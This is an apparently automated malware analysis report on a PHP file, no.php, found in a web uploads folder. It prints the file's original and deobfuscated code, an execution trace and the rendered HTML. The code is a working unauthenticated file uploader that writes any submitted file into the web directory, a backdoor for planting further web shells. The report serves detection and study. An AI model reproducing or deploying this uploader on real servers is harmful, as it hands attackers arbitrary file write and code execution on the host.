PHP Malware Analysis
no.php
md5: 546834244f4d8ca3fa041180643c5230
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Input
- _FILES (Deobfuscated, Original)
Deobfuscated PHP code
<?php
if (file_exists($_FILES["uploadfile"]["tmp_name"])) {
$filename = $_FILES["uploadfile"]["tmp_name"];
$fp = @fopen($filename, "r");
$contents = @fread($fp, filesize($filename));
@fclose($fp);
$fp = fopen($_FILES["uploadfile"]["name"], "w");
fputs($fp, $contents);
fclose($fp);
echo "file " . $_FILES["uploadfile"]["name"] . " Uploaded :) !";
}
?>
<FORM ENCTYPE="multipart/form-data" METHOD="POST">
</script><br>
<b>File:</b> <INPUT NAME="uploadfile" TYPE="file">
<INPUT TYPE="submit" VALUE="Send">
</FORM>Execution traces
data/traces/546834244f4d8ca3fa041180643c5230_trace-1676241905.9102.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:45:31.808076]
1 0 1 0.000153 393464
1 3 0 0.000223 398152 {main} 1 /var/www/html/uploads/no.php 0 0
2 4 0 0.000255 398152 file_exists 0 /var/www/html/uploads/no.php 2 1 NULL
2 4 1 0.000270 398192
2 4 R FALSE
1 3 1 0.000285 398152
0.000320 314200
TRACE END [2023-02-12 20:45:31.808273]
Generated HTML code
<html><head></head><body><form enctype="multipart/form-data" method="POST">
<br>
<b>File:</b> <input name="uploadfile" type="file">
<input type="submit" value="Send">
</form></body></html>Original PHP code
<?php
if( file_exists($_FILES["uploadfile"]["tmp_name"]) )
{
$filename = $_FILES["uploadfile"]["tmp_name"];
$fp=@fopen($filename,"r");
$contents=@fread($fp, filesize($filename));
@fclose($fp);
$fp = fopen($_FILES["uploadfile"]["name"], "w");
fputs($fp, $contents);
fclose($fp);
echo "file ". $_FILES["uploadfile"]["name"] ." Uploaded :) !";
}
?>
<FORM ENCTYPE="multipart/form-data" METHOD="POST">
</script><br>
<b>File:</b> <INPUT NAME="uploadfile" TYPE="file">
<INPUT TYPE="submit" VALUE="Send">
</FORM>